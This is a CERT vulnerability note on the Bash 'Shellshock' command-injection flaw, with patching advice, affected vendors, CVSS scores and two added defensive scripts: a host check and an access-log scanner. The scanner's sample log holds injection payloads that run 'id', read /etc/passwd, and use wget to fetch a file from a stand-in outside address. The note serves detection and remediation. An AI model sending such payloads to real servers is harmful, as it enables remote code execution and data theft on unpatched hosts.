Vulnerability Note VU#252743

GNU Bash shell executes commands in exported functions in environment variables

Original Release date: 25 Sep 2014 | Last revised: 14 Apr 2015

Overview

GNU Bash 4.3 and earlier contains a command injection vulnerability that may allow remote code execution.

Description

UPDATE: New CVE-IDs added for incomplete patches. Additional resources added and vendor patch information updated.

CWE-78: OS Command Injection

Bash can export shell functions to child instances of bash through the environment: the variable is named after the function, and its value begins with the string "() {" followed by the function body. When a new bash process starts, it looks for such variables and evaluates their values as shell code in order to define the functions. In affected versions bash evaluates the entire value, so instead of stopping at the closing brace of the function body it goes on to execute any shell commands written after it, with the privileges of the new bash process. This vulnerability is especially critical because Bash is widespread on many types of devices (UNIX-like operating systems including Linux and Mac OS X), and because many network services invoke Bash with environment variables derived from untrusted input, which makes the flaw network exploitable. Any service or program that sets environment variables controlled by an attacker and then calls Bash, directly or through a program that spawns a shell, may be vulnerable.

Red Hat has developed the following test:

$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

A vulnerable bash prints "vulnerable" before "this is a test"; a patched bash prints only "this is a test" (some patched versions also warn on stderr that the function definition in x was ignored).

The website shellshocker.net, from the health IT team at Medical Informatics Engineering, provides several tests for websites and hosts and includes update information.

This vulnerability is being actively exploited.
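The Red Hat test above is meant to be typed at a prompt. The following script, added here as an example and not part of the CERT note, wraps the same test so it can be run against any bash binary from a fleet-management job: it runs the test in a child process, classifies the output, and exercises its own "vulnerable" branch with a stand-in script that prints what an affected bash prints. The default binary name "bash", the exit-code convention, and the stand-in are assumptions of this example.

```shell
#!/bin/sh
# Added example, not from the CERT note: run the Red Hat test from the
# advisory against a chosen bash binary in a child process and classify
# the result, so the check can be scripted across hosts.
# Exit status of shellshock_check: 0 = vulnerable, 1 = not vulnerable,
# 2 = binary missing or the test command failed to run.

shellshock_check() {
    bin="${1:-bash}"                     # default binary name is assumed
    command -v "$bin" >/dev/null 2>&1 || return 2
    # Red Hat's test: the value begins with "() {", which an affected bash
    # treats as a function export; the command after the closing brace
    # must not run on a fixed bash.
    out=$(env x='() { :;}; echo vulnerable' "$bin" -c 'echo this is a test' 2>/dev/null) || return 2
    case "$out" in
        *vulnerable*) return 0 ;;
        *)            return 1 ;;
    esac
}

# Human-readable verdict; always exits 0, so it is safe under set -e.
shellshock_report() {
    rc=0
    shellshock_check "$1" || rc=$?
    case "$rc" in
        0) echo "vulnerable" ;;
        1) echo "not vulnerable" ;;
        *) echo "unknown" ;;
    esac
}

# Stand-in for an unpatched bash (an assumption of this example), used to
# exercise the "vulnerable" branch without a 2014-era binary: it ignores
# its arguments and prints exactly what an affected bash prints.
make_fake_vulnerable_bash() {
    dir="$1"
    printf '#!/bin/sh\nprintf "vulnerable\\nthis is a test\\n"\n' > "$dir/bash"
    chmod +x "$dir/bash"
    echo "$dir/bash"
}

# Demo: check the system bash, then the stand-in.
echo "bash: $(shellshock_report bash)"
if tmp=$(mktemp -d); then
    fake=$(make_fake_vulnerable_bash "$tmp")
    echo "$fake: $(shellshock_report "$fake")"
    rm -rf "$tmp"
fi
```

Run it as `sh check.sh` on each host, or call `shellshock_check /path/to/bash` for every bash binary found (embedded copies under /opt or in appliance firmware are easy to miss when only the package manager is consulted).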

Impact

An attacker who can control an environment variable passed to Bash may be able to execute arbitrary commands with the privileges of the calling application. Where that application is a network service (for example a CGI handler), the attacker can be remote and unauthenticated.

Solution

Apply an Update
The first set of patches (for CVE-2014-6271) did not completely resolve the vulnerability. CVE-2014-7169, CVE-2014-6277, CVE-2014-7186, and CVE-2014-7187 identify the remaining aspects of this vulnerability; apply your vendor's updates for all of them and re-run the test above afterwards. Red Hat has provided a support article with updated information and workarounds.

CERT/CC has also included vendor patch information below when notified of an update.

Vendor Information

Many UNIX-like operating systems, including Linux distributions and Apple Mac OS X, include Bash and are likely to be vulnerable. Contact your vendor for information about updates or patches. The Red Hat support article and blog post describe ways that Bash can be called from other programs, including network vectors such as CGI (request headers become environment variables of the handler), SSH (a forced command is run by the user's shell with the client-supplied command in SSH_ORIGINAL_COMMAND), and DHCP (client hook scripts receive server-supplied option values in their environment). Shell Shock Exploitation Vectors describes other ways this vulnerability could be exploited.
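Because CGI copies request headers such as User-Agent and Referer into the handler's environment (as HTTP_USER_AGENT and HTTP_REFERER), an attempt against the CGI vector leaves the "() {" payload verbatim in the web server's access log. The script below is an added example, not part of the CERT note: it scans access-log lines for that signature, counts attempts, and lists the source addresses. The log lines are constructed for this example; the addresses, paths, and timestamps are invented.

```shell
#!/bin/sh
# Added example, not from the CERT note: look for Shellshock attempts in
# web-server access logs. With CGI, request headers such as User-Agent and
# Referer are copied into the handler's environment (HTTP_USER_AGENT,
# HTTP_REFERER), so an attacker's "() {" payload shows up verbatim in the
# logged header fields. The log lines below are constructed for this
# example; the addresses, paths and timestamps are invented.

# Constructed sample in Apache combined-log format: two hits from one
# source, one hit carrying the payload in the Referer field, and one
# benign line whose braces must not match.
sample_log() {
cat <<'EOF'
203.0.113.7 - - [25/Sep/2014:10:01:12 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :;}; /bin/bash -c \"id\""
198.51.100.23 - - [25/Sep/2014:10:01:13 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (X11; Linux x86_64) {beta}"
203.0.113.9 - - [25/Sep/2014:10:02:40 +0000] "GET /cgi-bin/env.sh HTTP/1.1" 200 128 "() { :;}; /usr/bin/wget http://198.51.100.5/x -O /tmp/x" "curl/7.38.0"
203.0.113.7 - - [25/Sep/2014:10:03:01 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :;}; /bin/bash -c \"cat /etc/passwd\""
EOF
}

# Print the log lines that carry the signature. An affected bash only
# treats a value as a function export when it begins with the exact bytes
# "() {", so a fixed-string match (no regex) is the right test.
shellshock_scan() {
    grep -F '() {' || true
}

# Number of matching lines (prints 0 and exits 0 when there are none).
shellshock_count() {
    grep -Fc '() {' || true
}

# Unique source addresses of matching lines, one per line, sorted.
shellshock_sources() {
    shellshock_scan | awk '{ print $1 }' | sort -u
}

# Demo on the constructed sample.
echo "attempts: $(sample_log | shellshock_count)"
echo "sources:"
sample_log | shellshock_sources
```

Feed a real log with `shellshock_scan < /var/log/apache2/access.log`; a hit shows the attempt was made, not that it succeeded, so pair it with the host check and with process or outbound-connection telemetry from the CGI host for that time window.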

Vendor                               Status    Date Notified  Date Updated
Apple Inc.                           Affected  25 Sep 2014    01 Oct 2014
Avaya, Inc.                          Affected  25 Sep 2014    29 Sep 2014
Barracuda Networks                   Affected  25 Sep 2014    27 Sep 2014
Blue Coat Systems                    Affected  25 Sep 2014    27 Sep 2014
CentOS                               Affected  -              27 Sep 2014
Check Point Software Technologies    Affected  25 Sep 2014    27 Sep 2014
Cisco Systems, Inc.                  Affected  25 Sep 2014    26 Sep 2014
Cygwin                               Affected  -              26 Sep 2014
D-Link Systems, Inc.                 Affected  25 Sep 2014    07 Oct 2014
Debian GNU/Linux                     Affected  25 Sep 2014    27 Sep 2014
Dell Computer Corporation, Inc.      Affected  -              27 Sep 2014
Extreme Networks                     Affected  25 Sep 2014    01 Oct 2014
F5 Networks, Inc.                    Affected  25 Sep 2014    26 Sep 2014
Fedora Project                       Affected  25 Sep 2014    27 Sep 2014
FireEye                              Affected  -              02 Oct 2014

CVSS Metrics

Group          Score  Vector
Base           10.0   AV:N/AC:L/Au:N/C:C/I:C/A:C
Temporal        9.5   E:H/RL:W/RC:C
Environmental   9.6   CDP:LM/TD:H/CR:ND/IR:ND/AR:ND

Credit

This document was written by Chris King.

Feedback

If you have feedback, comments, or additional information about this vulnerability, please send us email.